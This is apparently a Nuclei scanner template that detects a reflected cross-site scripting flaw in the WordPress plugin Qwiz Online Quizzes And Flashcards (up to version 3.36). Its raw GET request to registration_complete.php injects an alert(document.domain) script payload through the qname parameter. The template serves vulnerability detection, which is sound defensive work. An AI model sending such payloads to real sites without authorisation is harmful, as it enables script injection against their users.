2023-10-17 07:20:28 +00:00
id : wp-qwiz-online-xss
info :
name : Qwiz Online Quizzes And Flashcards <= 3.36 - Cross-Site Scripting
author : r3Y3r53
severity : medium
description : |
The qname, i_qwiz, session_id and username parameters passed to the registration_complete.php file are affected by XSS issues.
2023-10-17 13:27:49 +00:00
remediation : Fixed in version 3.37
reference :
2023-10-17 07:20:28 +00:00
- https://wpscan.com/vulnerability/d3c10f69-87b6-43fd-bcbc-c2d35b683ff4
- https://packetstormsecurity.com/files/154403/
- https://wordpress.org/plugins/qwiz-online-quizzes-and-flashcards/
metadata :
verified : true
max-request : 1
2023-10-17 17:52:26 +00:00
publicwww-query : "/wp-content/plugins/qwiz-online-quizzes-and-flashcards/"
2024-01-14 09:21:50 +00:00
tags : wordpress,wp-plugin,wp,wpscan,packetstorm,qwiz-online-quizzes-and-flashcards,xss
2023-10-17 07:20:28 +00:00
http :
- raw :
- |
GET /wp-content/plugins/qwiz-online-quizzes-and-flashcards/registration_complete.php?&qname=%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1
Host : {{Hostname}}
matchers :
- type : dsl
dsl :
- 'status_code == 200'
2024-03-26 17:26:22 +00:00
- 'contains_all(body, "quizzes/flashcard", "</script><script>alert(document.domain)</script>")'
2023-10-17 07:20:28 +00:00
condition : and
2024-04-08 11:29:20 +00:00
# digest: 4a0a004730450220789c613836e44bf878c67ae114897d118c16180f2823236c357572cfc44cfd6c022100db98b011a70b34fa2441cdb89ee884b588278c5d7a374b240d0763f99589a72f:922c64590222798bb761d5b6d8e72950